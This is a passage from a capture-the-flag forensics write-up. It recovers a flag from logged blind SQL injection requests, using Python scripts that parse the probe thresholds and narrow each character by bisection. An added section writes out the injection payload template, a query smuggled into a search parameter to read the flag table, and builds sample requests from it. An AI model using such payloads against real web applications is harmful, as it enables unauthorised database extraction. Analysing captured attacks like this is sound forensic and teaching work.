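    data = f.read().split("\n")

tmp = []   # threshold chosen for each character so far
tmpN = []  # the 7 thresholds tested for the current character

for x in range(PROBES_PER_CHAR * POSITIONS):
    # The threshold is the number between ">" and the following space
    tmpN.append(data[x].split(">")[1].split(" ")[0])
    # After the 7th probe of a character, show the options and ask which one to keep
    if x % PROBES_PER_CHAR == PROBES_PER_CHAR - 1:
        print("Current Flag: " + "".join(chr(int(c)) for c in tmp))
        print("1-2-3-4-5-6-7")
        print("-".join(chr(int(c)) for c in tmpN))
        choose = int(input("Choose: "))
        tmp.append(tmpN[choose - 1])
        tmpN = []

print(tmp)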

After some trial and error, we got the result shown in the image.

We then made a small correction by changing p to t.

Flag: GEMASTIK{know_the_concept_not_the_tools!}
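
The order of the probes narrows each character further than the seven choices the script above offers: in a bisection, a higher next threshold means the previous `>` test was true, and a lower one means it was false. The following is an added example, not part of the original write-up, that applies this to lines in the dataclean format; the function names are illustrative, the sample lines are rebuilt from positions 29, 40, 41 and 42 of the capture, and a search range of 0 to 127 is assumed.

```python
import re

# Position and threshold in a probe line of the dataclean format.
PROBE = re.compile(r"LIMIT 0,1\),(\d+),1\)\)>(\d+)")
LINE = ("GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS "
        "CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),{},1))>{} AND '%'='HTTP/1.1")
# Constructed sample: threshold sequences of positions 29, 40, 41 and 42 above.
SEQS = {29: [64, 96, 112, 120, 116, 114, 115], 40: [64, 32, 48, 40, 36, 34, 33],
        41: [64, 96, 112, 120, 124, 126, 125], 42: [64, 32, 16, 8, 4, 2, 1]}
SAMPLE = [LINE.format(pos, t) for pos, seq in SEQS.items() for t in seq]


def group_probes(lines):
    """Return {position: [thresholds in request order]}, skipping other lines."""
    probes = {}
    for line in lines:
        m = PROBE.search(line)
        if m:
            probes.setdefault(int(m.group(1)), []).append(int(m.group(2)))
    return probes


def candidates(thresholds, lo=0, hi=127):
    """Code points still possible for one character, judged from requests alone.

    lo/hi are the assumed bounds of the search (7-bit ASCII). The last probe
    has no successor, so its outcome is unknown and more than one value remains.
    """
    for t, nxt in zip(thresholds, thresholds[1:]):
        if nxt > t:        # search moved up: 'char > t' was true
            lo = max(lo, t + 1)
        elif nxt < t:      # search moved down: 'char > t' was false
            hi = min(hi, t)
        # nxt == t is a retried request and tells us nothing new
    return list(range(lo, hi + 1))


def recover(lines):
    """Return {position: string of the remaining candidate characters}."""
    return {pos: "".join(map(chr, candidates(ts)))
            for pos, ts in group_probes(lines).items()}


if __name__ == "__main__":
    for pos, chars in recover(SAMPLE).items():
        print(pos, repr(chars))
```

Deciding between the remaining candidates needs the server's response to the last probe of each character, which these request lines do not carry. Position 42 narrows to code points 0 to 2, which marks the end of the string.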
